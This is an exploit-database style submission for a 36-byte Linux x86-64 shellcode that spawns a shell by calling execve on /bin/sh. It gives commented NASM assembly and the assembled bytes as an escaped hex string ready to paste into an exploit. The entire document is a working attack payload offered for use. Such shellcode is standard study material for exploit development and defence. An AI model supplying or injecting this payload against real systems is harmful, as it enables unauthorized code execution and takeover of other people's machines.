# Exploit Title: Linux/x86-64 execve("/bin/sh") Shellcode (36 bytes) # Date: 2025-03-23 # Exploit Author: Sayan Ray [@barebones90] # Tested on: Linux x86-64 # CVE: N/A ; P0P SH311 execve ("/bin/sh", NULL, NULL) GLOBAL _start section .text _start: xor rax, rax push rax mov r10, 0x68732f6e69622f ; hs/nib/ push r10 mov rdi, rsp ; rdi points to the string "/bin/sh" from the stack ; ( const char *pathname ) ; Calling execve mov rax, 0x3b ; 59 [execve syscall] mov rsi, 0 ; NULL ( char *const _Nullable argv[] ) mov rdx, 0 ; NULL ( char *const _Nullable envp[] ) syscall ; Shellcode: ; \x48\x31\xc0\x50\x49\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x41\x52\x48\x89\xe7\xb8\x3b\x00\x00\x00\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05 ; [Length] : 36